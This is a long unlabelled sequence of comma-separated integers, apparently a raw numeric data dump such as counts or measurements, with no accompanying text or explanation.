796, 170, 197, 173, 298, 13, 5, 0, 0, 2, 2, 797, 459, 387, 433, 1329, 1194, 954, 945, 811, 202, 0, 327, 184, 164, 320, 0, 0, 0, 0, 0, 82, 0, 0, 0, 0, 0, 0, 218, 290, 1, 1, 0, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 3, 9, 9, 3, 0, 12, 6, 0, 0, 0, 0, 0, 0, 0, 0, 274, 0, 0, 25, 45, 13, 0, 11, 0, 0, 2, 411, 1028, 288, 329, 8, 8, 422, 3, 32, 0, 5, 256, 262, 289, 189, 44, 2, 365, 6, 12, 1, 312, 264, 82, 0, 0, 7, 0, 13, 14, 0, 155, 0, 0, 0, 0, 0, 93, 0, 25, 37, 31, 37, 34, 143, 0, 0, 0, 1, 79, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 179, 35, 8, 7, 0, 0, 5, 7, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 296, 45, 47, 20, 0, 0, 0, 10, 0, 0, 7, 224, 158, 219, 170, 0, 1, 387, 11, 33, 0, 0, 0, 0, 103, 0, 135, 163, 526, 168, 161, 210, 775, 0, 0, 0, 0, 11, 13, 1, 0, 0, 184, 0, 0, 0, 0, 0, 231, 37, 9, 0, 0, 0, 0, 0, 0, 0, 0, 40, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 1, 1, 0, 0, 87, 187, 283, 0, 0, 0, 0, 4, 6, 0, 60, 28, 287, 96, 132, 92, 0, 0, 447, 0, 29, 0, 0, 0, 2, 103, 0, 0, 0, 380, 0, 12, 25, 527, 278, 0, 0, 0, 0, 13, 0, 0, 0, 133, 24, 0, 0, 0, 0, 123, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 44, 0, 0, 1, 0, 0, 0, 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 2, 111, 36, 0, 251, 150, 0, 0, 0, 16, 3, 0, 11, 113, 263, 77, 257, 105, 0, 0, 427, 6, 18, 0, 0, 0, 0, 89, 0, 0, 0, 479, 24, 25, 2, 1, 390, 0, 0, 0, 0, 14, 0, 0, 0, 0, 180, 0, 0, 0, 0, 199, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 35, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 71, 22, 0, 2, 1, 223, 350, 0, 0, 38, 185, 2, 23, 4017, 200, 0, 250, 121, 0, 0, 521, 416, 0, 0, 0, 11, 118, 34, 0, 2, 0, 546, 29, 2, 3, 1, 449, 0, 0, 1, 8, 5, 1, 0, 1, 0, 151, 0, 0, 0, 0, 9, 153, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 0, 0, 0, 0, 0, 0, 18, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 24, 97, 0, 0, 0, 1, 93, 112, 263, 39, 90, 202, 59, 10, 76, 227, 0, 195, 161, 0, 0, 0, 515, 3, 20, 39, 199, 0, 0, 0, 5, 0, 531, 1, 3, 0, 2, 147, 314, 0, 0, 13, 1, 1, 1, 0, 0, 230, 0, 0, 0, 0, 121, 222, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 0, 0, 0, 1, 0, 16, 22, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 71, 79, 0, 0, 0, 0, 32, 55, 0, 326, 1, 288, 205, 226, 188, 512, 422, 255, 443, 1631, 0, 0, 242, 323, 104, 15, 0, 219, 0, 6, 0, 9, 0, 460, 1, 3, 2, 0, 3, 442, 2, 3, 36, 0, 0, 2, 0, 0, 191, 3, 55, 89, 95, 35, 88, 35, 0, 0, 0, 0, 0, 0, 0, 0, 35, 0, 0, 0, 0, 27, 26, 54, 241, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 95, 27, 0, 0, 0, 0, 0, 47, 18, 115, 114, 239, 271, 14, 0, 45, 99, 169, 105, 385, 110, 0, 0, 444, 0, 0, 1, 2, 310, 0, 0, 0, 0, 1, 731, 937, 11, 1, 0, 0, 159, 347, 12, 31, 0, 6, 0, 1, 80, 495, 208, 188, 0, 0, 0, 0, 102, 0, 0, 0, 0, 0, 0, 0, 0, 28, 0, 0, 21, 40, 31, 448, 188, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 17, 100, 96, 99, 93, 64, 2, 0, 0, 0, 0, 0, 0, 140, 213, 1426, 3419, 2820, 1811, 1447, 1445, 1567, 1412, 1400, 1055, 2503, 172, 6, 3, 493, 2, 1, 0, 0, 300, 41, 24, 0, 15, 592, 1055, 1081, 1591, 540, 1163, 0, 200, 350, 35, 27, 34, 23, 99, 89, 470, 60, 128, 46, 0, 0, 0, 0, 89, 50, 0, 0, 0, 0, 0, 0, 0, 41, 29, 48, 19, 366, 814, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 38, 0, 12, 34, 0, 85, 91, 95, 74, 67, 3, 0, 0, 0, 3, 0, 0, 1, 0, 70, 80, 29, 17, 432, 523, 724, 3, 1, 100, 165, 446, 167, 2957, 368, 46, 1, 465, 6, 29, 11, 97, 2446, 970, 65, 21, 19, 599, 80, 6, 476, 248, 325, 1020, 504, 299, 67, 152, 81, 0, 174, 360, 68, 0, 71, 3, 0, 0, 0, 0, 0, 248, 44, 0, 0, 0, 0, 0, 26, 527, 1335, 857, 527, 227, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 238, 28, 10, 26, 137, 92, 83, 81, 9, 15, 158, 85, 87, 94, 224, 113, 120, 127, 127, 131, 52, 0, 0, 546, 357, 1713, 1015, 1748, 880, 933, 968, 1361, 2581, 2788, 1927, 1570, 1989, 1593, 1381, 1421, 1670, 3442, 2235, 2209, 2988, 3178, 2105, 0, 498, 1037, 1340, 190, 1365, 1476, 86, 271, 13, 138, 747, 1658, 493, 0, 0, 37, 2, 1, 0, 0, 0, 0, 0, 306, 73, 0, 0, 22, 39, 493, 569, 0, 0, 0, 0, 49, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 68, 179, 0, 1, 83, 79, 1, 144, 151, 106, 0, 1058, 0, 0, 29, 315, 754, 699, 594, 673, 958, 620, 383, 333, 42, 0, 0, 140, 194, 596, 235, 200, 148, 1016, 52, 344, 0, 0, 645, 69, 3676, 3893, 139, 570, 970, 1003, 308, 360, 756, 1804, 397, 49, 445, 204, 1390, 250, 251, 80, 0, 0, 78, 0, 5, 1, 0, 0, 0, 4, 191, 82, 25, 33, 12, 506, 540, 18, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 100, 28, 117, 36, 185, 162, 243, 397, 220, 518, 942, 419, 9564, 370, 815, 730, 483, 31, 143, 0, 0, 123, 130, 104, 1221, 16, 0, 0, 136, 77, 402, 27, 19, 15, 1040, 4, 384, 1, 0, 686, 3, 1875, 497, 70, 72, 1157, 990, 18, 5, 7, 928, 1065, 1569, 2374, 1347, 278, 5, 258, 134, 0, 0, 180, 2, 19, 144, 0, 0, 9, 23, 32, 159, 124, 0, 262, 375, 66, 27, 27, 0, 0, 0, 0, 49, 0, 0, 0, 9, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 99, 3, 0, 179, 271, 0, 0, 37, 109, 0, 262, 1, 0, 0, 0, 369, 75, 78, 23, 193, 0, 0, 0, 808, 421, 1956, 121, 0, 274, 211, 151, 726, 272, 22, 110, 715, 22, 408, 7, 6, 519, 9, 1869, 179, 219, 273, 191, 838, 1015, 1, 1143, 1813, 6, 13, 427, 24, 159, 47, 231, 169, 98, 721, 241, 214, 23, 150, 6, 38, 40, 31, 9, 118, 156, 423, 231, 0, 0, 0, 35, 0, 0, 0, 0, 49, 26, 0, 9, 0, 5, 8, 5, 8, 1, 0, 0, 0, 8, 35, 68, 106, 2, 186, 185, 46, 59, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 354, 0, 109, 13, 180, 3, 0, 0, 567, 625, 615, 721, 5, 46, 193, 63, 613, 273, 77, 30, 1057, 228, 373, 4, 168, 613, 0, 675, 1648, 876, 87, 705, 486, 3246, 1451, 808, 2315, 11, 279, 1853, 129, 439, 257, 135, 244, 99, 1360, 1594, 1172, 401, 835, 45, 8, 78, 10, 119, 617, 446, 0, 0, 0, 0, 0, 126, 0, 0, 0, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 8, 8, 8, 18, 70, 126, 83, 40, 50, 223, 185, 0, 0, 47, 0, 0, 0, 0, 0, 0, 0, 0, 0, 340, 173, 103, 0, 28, 145, 0, 0, 312, 458, 1747, 1481, 197, 96, 524, 26, 875, 547, 0, 63, 1230, 536, 498, 161, 5160, 87, 636, 1522, 4948, 5191, 13106, 8359, 24032, 15732, 24340, 7017, 756, 18, 644, 2477, 923, 0, 162, 278, 11786, 739, 1995, 4575, 2046, 1078, 16, 22, 465, 67, 600, 1063, 1552, 30, 1, 0, 0, 0, 0, 52, 2, 0, 0, 0, 0, 71, 0, 0, 75, 0, 0, 0, 0, 1, 0, 67, 162, 97, 0, 0, 44, 57, 25, 51, 65, 129, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 423, 74, 2, 0, 0, 165, 416, 368, 629, 621, 3103, 1832, 5061, 1407, 1454, 1674, 1870, 1559, 1176, 1284, 2386, 2230, 2896, 1614, 2937, 2151, 2092, 1014, 1976, 3342, 11396, 20286, 27802, 18490, 25632, 9056, 2560, 605, 555, 5264, 2122, 2085, 2895, 2100, 3207, 1599, 1787, 3149, 24, 53, 0, 922, 2043, 1241, 294, 4414, 2760, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 126, 0, 411, 148, 0, 0, 1, 0, 0, 159, 143, 0, 0, 0, 0, 25, 13, 0, 0, 35, 64, 18, 52, 55, 50, 0, 0, 0, 0, 0, 0, 430, 0, 0, 0, 3, 677, 404, 0, 302, 42, 44, 38, 1833, 751, 1421, 111, 399, 4, 1, 0, 456, 130, 801, 386, 1, 711, 10609, 739, 649, 8441, 16697, 32814, 24246, 19164, 9082, 6336, 7137, 3759, 2735, 6293, 4711, 230, 877, 4951, 3158, 1244, 67, 214, 101, 42, 160, 6893, 5320, 125, 128, 712, 175, 29, 0, 0, 0, 0, 0, 9, 35, 0, 0, 0, 164, 0, 0, 1, 382, 16, 3, 2, 1, 147, 48, 0, 0, 2, 0, 0, 0, 0, 0, 0, 20, 54, 0, 0, 0, 5, 59, 61, 61, 37, 0, 0, 431, 0, 0, 0, 453, 187, 0, 0, 337, 0, 0, 0, 39, 981, 1446, 37, 384, 0, 5, 12, 525, 180, 1897, 3880, 3163, 5005, 6395, 3423, 3296, 14512, 4019, 17066, 5370, 18497, 6851, 5956, 8107, 7573, 62416, 10825, 1243, 1801, 1667, 1156, 1370, 654, 125, 431, 20, 1938, 1440, 2345, 2336, 1820, 838, 42, 39, 28, 0, 0, 0, 0, 0, 0, 44, 0, 0, 0, 258, 0, 0, 353, 237, 819, 135, 18, 164, 13, 0, 0, 0, 0, 8, 360, 354, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 28, 69, 66, 480, 12, 0, 0, 502, 166, 29, 127, 500, 0, 0, 0, 0, 935, 388, 137, 284, 3, 14, 0, 458, 552, 934, 3654, 143, 1, 844, 602, 168, 15698, 4864, 24637, 20190, 42989, 12015, 34772, 36110, 39954, 30017, 18860, 1184, 323, 60, 47, 522, 5801, 335, 1714, 3784, 344, 3, 1402, 836, 13997, 2350, 108, 2, 1, 2, 1, 0, 0, 0, 0, 35, 0, 0, 6, 192, 0, 0, 353, 358, 211, 381, 383, 0, 0, 3, 320, 365, 336, 315, 233, 355, 302, 0, 0, 1, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 436, 48, 57, 48, 381, 157, 0, 0, 344, 2, 0, 0, 0, 914, 770, 174, 741, 351, 1190, 397, 1369, 1810, 342, 3742, 84, 93, 1385, 2965, 2077, 8743, 13799, 126023, 87287, 33288, 19933, 38810, 18770, 7810, 2879, 848, 52, 355, 139, 255, 1325, 1394, 2356, 880, 13, 665, 15, 9810, 19321, 12327, 353, 376, 80, 76, 0, 0, 0, 0, 0, 0, 41, 0, 0, 268, 14, 0, 0, 318, 0, 82, 127, 225, 531, 839, 686, 897, 298, 312, 305, 285, 287, 447, 735, 405, 402, 485, 659, 1, 6, 538, 589, 593, 648, 612, 623, 682, 882, 390, 424, 445, 664, 268, 62, 71, 380, 95, 119, 109, 254, 756, 1520, 4083, 2879, 1878, 3051, 1870, 4363, 10848, 2606, 3965, 1081, 634, 242, 863, 357, 6285, 3910, 73097, 14112, 14324, 878, 3267, 2279, 594, 558, 232, 54, 320, 171, 374, 2707, 1900, 416, 260, 13, 335, 887, 1182, 83, 1380, 41, 51, 0, 32, 0, 0, 0, 0, 0, 0, 584, 92, 0, 0, 0, 0, 0, 2, 113, 97, 0, 0, 0, 77, 19, 6, 0, 0, 0, 0, 0, 158, 0, 0, 0, 34, 167, 643, 586, 352, 0, 0, 0, 0, 0, 0, 424, 0, 0, 124, 376, 440, 421, 549, 1874, 968, 1924, 1185, 1772, 3229, 3420, 4140, 1962, 164, 725, 668, 1484, 480, 1006, 2664, 639, 1299, 1147, 1975, 878, 14727, 2158, 13396, 17193, 14583, 42, 1560, 1494, 4838, 1458, 4053, 3916, 932, 3129, 3659, 325, 266, 76, 16, 0, 243, 260, 1076, 120, 336, 36, 32, 0, 25, 0, 0, 0, 0, 0, 0, 130, 8, 0, 0, 0, 0, 0, 71, 69, 0, 0, 0, 0, 94, 2, 0, 0, 0, 0, 0, 0, 89, 0, 0, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 200, 1, 1, 100, 267, 859, 1, 895, 2792, 1062, 1444, 1, 227, 303, 605, 2155, 4821, 4120, 3317, 4549, 7358, 4508, 5736, 7440, 7871, 2832, 2148, 3499, 2000, 9514, 4899, 7988, 7405, 22324, 4085, 4442, 3343, 2638, 4211, 4209, 1525, 3195, 6804, 1484, 572, 188, 7, 44, 2, 95, 10, 1136, 226, 517, 0, 30, 0, 20, 0, 0, 0, 0, 46, 147, 19, 0, 0, 0, 0, 0, 0, 112, 0, 0, 0, 0, 0, 77, 0, 0, 0, 0, 0, 0, 1, 163, 1, 0, 0, 28, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 187, 0, 0, 114, 207, 537, 132, 315, 1728, 368, 842, 597, 1608, 203, 271, 833, 1990, 791, 893, 444, 1208, 21, 557, 805, 2726, 511, 2531, 4958, 1725, 6597, 1, 2618, 2940, 16275, 1254, 1150, 733, 447, 1427, 3855, 1248, 854, 26, 1499, 174, 0, 0, 52, 0, 70, 19, 1837, 557, 256, 50, 56, 0, 23, 0, 0, 0, 65, 116, 7, 0, 0, 0, 0, 0, 0, 0, 87, 0, 0, 0, 0, 68, 64, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 30, 1, 0, 0, 0, 0, 0, 3, 26, 2, 7, 6, 228, 0, 0, 19, 64, 373, 126, 306, 1127, 1351, 98, 48, 105, 0, 1, 813, 1321, 701, 748, 259, 879, 115, 628, 564, 94, 3105, 8995, 1381, 2291, 7173, 154, 4629, 2929, 9189, 1079, 2999, 2513, 2720, 2981, 39, 53, 485, 35, 54, 46, 133, 22, 63, 11, 93, 16, 862, 376, 465, 241, 338, 211, 295, 106, 61, 41, 178, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 27, 23, 24, 16, 0, 0, 0, 0, 0, 5, 10, 0, 0, 0, 1, 198, 0, 0, 0, 178, 183, 519, 1117, 1908, 998, 1268, 995, 943, 1073, 1499, 2844, 4610, 4490, 1240, 1416, 1685, 699, 1344, 1400, 1265, 4979, 1048, 1206, 1568, 7033, 354, 4065, 848, 7782, 471, 2362, 2959, 413, 1501, 509, 2313, 1114, 92, 234, 147, 93, 0, 37, 16, 58, 19, 940, 0, 39, 110, 32, 1, 1, 234, 12, 0, 147, 338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 23, 8, 0, 1, 2, 0, 0, 0, 0, 0, 29, 0, 0, 0, 0, 19, 199, 0, 0, 30, 206, 103, 174, 906, 836, 78, 110, 290, 247, 5, 1, 1286, 1738, 89, 50, 17, 227, 36, 668, 14, 944, 3354, 2233, 2014, 2063, 7910, 2883, 6373, 2717, 7667, 4432, 1463, 3013, 956, 1381, 123, 654, 519, 0, 109, 1, 6, 0, 0, 66, 0, 660, 315, 0, 13, 56, 33, 0, 0, 268, 30, 29, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 18, 11, 0, 0, 1, 2, 0, 0, 0, 0, 165, 0, 0, 0, 0, 6, 217, 0, 0, 0, 0, 162, 399, 478, 1104, 760, 348, 390, 695, 204, 1301, 3619, 1789, 6, 0, 1, 66, 0, 611, 220, 733, 2315, 77, 0, 403, 6322, 182, 2107, 1700, 7330, 4835, 2672, 5823, 2054, 2616, 640, 172, 1571, 1, 60, 0, 4, 0, 0, 50, 0, 981, 0, 0, 0, 0, 38, 0, 0, 104, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 2, 1, 0, 0, 0, 23, 0, 0, 0, 0, 17, 204, 0, 0, 0, 0, 279, 236, 692, 1514, 767, 0, 51, 77, 263, 518, 4852, 3189, 12, 22, 21, 216, 7, 1785, 1824, 434, 2616, 117, 0, 204, 6416, 125, 1521, 2418, 4175, 5985, 2477, 2730, 919, 999, 59, 192, 1093, 0, 103, 0, 0, 5, 0, 57, 856, 176, 0, 0, 0, 0, 27, 0, 0, 92, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 47, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 0, 2, 1, 0, 0, 32, 0, 0, 0, 0, 34, 183, 16, 12, 19, 84, 490, 521, 841, 1145, 870, 384, 987, 460, 1403, 2500, 2227, 3506, 416, 323, 521, 377, 161, 1340, 1986, 0, 2388, 82, 39, 444, 6604, 1400, 2158, 690, 975, 6826, 1376, 587, 563, 754, 1719, 304, 1116, 0, 171, 26, 0, 4, 0, 129, 952, 0, 0, 0, 0, 0, 21, 0, 0, 107, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 2, 0, 0, 0, 0, 2, 0, 0, 9, 6, 10, 13, 14, 16, 178, 0, 0, 0, 0, 455, 458, 181, 433, 566, 206, 2, 98, 235, 90, 250, 2346, 315, 786, 383, 611, 69, 2874, 1478, 156, 2537, 4, 321, 929, 6814, 3653, 1211, 141, 140, 7462, 943, 634, 929, 601, 149, 113, 1301, 10, 0, 140, 18, 160, 318, 2555, 58, 0, 0, 0, 0, 29, 21, 0, 0, 93, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 11, 188, 0, 0, 0, 0, 641, 607, 163, 320, 671, 54, 40, 148, 313, 123, 452, 1457, 3507, 2052, 564, 1001, 529, 1809, 454, 851, 4874, 1323, 1371, 2935, 7811, 1347, 3853, 1948, 933, 6786, 2332, 1723, 1520, 997, 587, 628, 3067, 1889, 2099, 1644, 603, 807, 6025, 12524, 49161, 920, 5148, 36, 10, 0, 21, 0, 0, 161, 0, 0, 0, 17, 7, 8, 4, 7, 0, 0, 14, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 180, 2, 10, 5, 53, 868, 1242, 318, 254, 765, 73, 57, 105, 261, 364, 1192, 1330, 2158, 837, 1785, 3090, 2772, 1394, 1044, 1402, 3946, 2335, 1628, 2672, 12667, 1945, 1620, 804, 858, 7834, 1651, 1215, 1556, 692, 419, 377, 1117, 307, 1999, 305, 1755, 2069, 3429, 3199, 2165, 3290, 417, 2555, 70, 83, 189, 68, 28, 599, 368, 146, 195, 1, 0, 0, 0, 0, 8, 25, 7, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, 27, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 182, 12, 0, 0, 0, 406, 911, 681, 647, 935, 154, 506, 213, 343, 82, 1167, 815, 73, 119, 0, 364, 62, 487, 282, 457, 2718, 1847, 1444, 2997, 4745, 3372, 2477, 5871, 6086, 16544, 12037, 18360, 63, 70, 0, 3, 644, 942, 2247, 2, 124, 67, 75, 1, 0, 0, 234, 5838, 16, 0, 42, 83, 51, 0, 0, 0, 86, 3, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 15, 29, 0, 0, 0, 0, 0, 0, 0, 0, 2, 171, 0, 0, 0, 1, 0, 689, 328, 248, 324, 162, 316, 2, 283, 37, 3136, 3738, 546, 364, 329, 547, 278, 3997, 5844, 2435, 5366, 8177, 9776, 7643, 10091, 51306, 11277, 6473, 4260, 6148, 10014, 1949, 0, 69, 1, 0, 603, 222, 3739, 96, 26, 134, 0, 0, 0, 0, 182, 1790, 3, 0, 25, 0, 0, 0, 0, 0, 62, 10, 8, 0, 0, 0, 0, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 27, 0, 0, 0, 0, 0, 0, 1, 0, 185, 0, 0, 0, 0, 2, 783, 220, 352, 149, 70, 320, 187, 277, 1, 795, 1212, 594, 569, 725, 1034, 601, 5887, 3020, 1365, 1433, 147, 1435, 268, 1358, 2899, 786, 56, 212, 3443, 885, 119, 0, 68, 0, 0, 639, 233, 1555, 333, 3235, 745, 10, 0, 0, 0, 13, 33, 20, 5, 77, 0, 0, 0, 0, 0, 78, 0, 0, 0, 0, 0, 0, 0, 0, 59, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 2, 0, 0, 0, 0, 0, 0, 0, 214, 0, 0, 0, 0, 520, 801, 386, 506, 79, 13, 201, 2241, 477, 588, 678, 710, 35, 15, 16, 865, 69, 2595, 1814, 285, 574, 305, 725, 1409, 4798, 728, 371, 806, 1401, 3946, 1048, 449, 238, 550, 399, 793, 2134, 15446, 4659, 314, 173, 220, 55, 0, 4, 3, 0, 23, 20, 0, 49, 0, 0, 0, 0, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 54, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 23, 1, 3, 0, 0, 0, 0, 0, 43, 326, 43, 26, 26, 23, 29, 905, 340, 193, 356, 325, 751, 517, 686, 487, 151, 781, 149, 45, 198, 516, 966, 843, 366, 211, 783, 374, 152, 6259, 801, 2721, 209, 92, 3907, 2080, 2722, 7, 0, 91, 57, 1715, 217, 5, 739, 147, 23, 9, 10, 0, 0, 2, 1, 4, 1067, 17, 30, 2, 2, 1, 2, 2, 48, 2, 0, 0, 0, 0, 0, 0, 0, 55, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 0, 2, 63, 100, 31, 34, 74, 50, 212, 16, 0, 0, 5, 6, 590, 514, 86, 75, 33, 546, 22, 141, 0, 157, 1261, 357, 595, 392, 634, 209, 2750, 441, 359, 269, 324, 3414, 1316, 116, 459, 8421, 6433, 1791, 2687, 2537, 1635, 1441, 1311, 226, 1789, 1166, 376, 215, 156, 0, 3, 0, 1, 0, 0, 0, 0, 16, 9, 20, 0, 0, 0, 0, 0, 44, 1, 2, 47, 46, 1, 2, 1, 2, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 5, 0, 2, 9, 0, 7, 14, 0, 178, 24, 0, 0, 9, 14, 446, 703, 635, 3007, 2143, 1873, 993, 4872, 2032, 145, 2298, 3463, 588, 402, 82, 456, 3787, 969, 101, 182, 2044, 3115, 2357, 42, 81, 2282, 14232, 22732, 9850, 1487, 258, 146, 552, 1810, 2255, 862, 161, 222, 8, 0, 0, 0, 0, 0, 1, 0, 0, 14, 42, 19, 0, 0, 0, 0, 0, 46, 0, 0, 14, 22, 0, 0, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 6, 0, 4, 13, 7, 0, 0, 78, 157, 0, 0, 28, 325, 359, 154, 70, 95, 211, 1149, 707, 2222, 1430, 1157, 2283, 3813, 2855, 3222, 1663, 1393, 6682, 2815, 2730, 3388, 1550, 865, 488, 1718, 1481, 4705, 13, 1378, 1935, 1035, 1035, 126, 523, 496, 803, 86, 655, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 28, 0, 0, 0, 0, 0, 0, 60, 13, 23, 3, 0, 0, 0, 0, 0, 62, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 23, 24, 62, 19, 0, 0, 0, 0, 325, 33, 80, 281, 123, 405, 0, 118, 86, 109, 194, 0, 193, 73, 88, 624, 453, 1427, 996, 527, 47, 3671, 0, 404, 477, 1340, 537, 439, 549, 4963, 232, 322, 318, 1812, 1046, 742, 1201, 2424, 1715, 736, 0, 16, 685, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 36, 0, 0, 0, 0, 0, 0, 25, 0, 0, 0, 0, 0, 0, 0, 0, 62, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 72, 80, 46, 0, 4, 0, 0, 0, 0, 407, 217, 119, 45, 333, 82, 260, 155, 281, 316, 163, 376, 167, 525, 3615, 5885, 4868, 3739, 3729, 17959, 5455, 625, 797, 604, 561, 0, 1, 2088, 165, 1309, 963, 422, 726, 144, 94, 103, 214, 322, 0, 0, 0, 187, 1151, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 24, 0, 0, 0, 0, 0, 68, 0, 0, 0, 0, 0, 0, 0, 5, 59, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 105, 44, 13, 12, 39, 2, 3, 0, 0, 294, 167, 229, 174, 14, 121, 0, 65, 11, 212, 100, 0, 185, 4, 433, 2177, 144, 175, 116, 472, 586, 2636, 0, 0, 0, 133, 318, 1801, 161, 212, 435, 951, 1296, 1190, 43, 94, 1, 177, 407, 0, 0, 0, 4, 100, 576, 473, 469, 448, 450, 444, 432, 418, 414, 450, 465, 747, 452, 491, 201, 43, 67, 0, 0, 148, 390, 384, 378, 41, 170, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 21, 52, 21, 4, 0, 45, 0, 3, 3, 416, 94, 42, 0, 40, 157, 346, 335, 1016, 502, 694, 543, 606, 673, 346, 612, 1991, 1035, 1182, 1070, 1248, 1165, 3672, 1767, 1575, 1538, 1649, 2198, 236, 820, 1160, 604, 398, 1463, 1137, 8, 0, 0, 295, 246, 0, 0, 0, 1, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 86, 0, 10, 283, 430, 423, 417, 410, 278, 9, 0, 20, 396, 522, 327, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 379, 1688, 449, 47, 0, 0, 0, 10, 40, 16, 406, 9, 6, 5, 0, 0, 0, 19, 2636, 4118, 63, 119, 54, 0, 159, 5, 84, 1272, 60, 309, 11, 24, 0, 399, 0, 0, 0, 263, 95, 1375, 656, 15, 16, 297, 1463, 551, 703, 21, 396, 163, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14, 13, 0, 0, 0, 0, 0, 0, 110, 13, 13, 13, 10, 39, 7, 70, 158, 0, 0, 0, 0, 175, 0, 7, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 22, 0, 0, 0, 0, 0, 0, 62, 464, 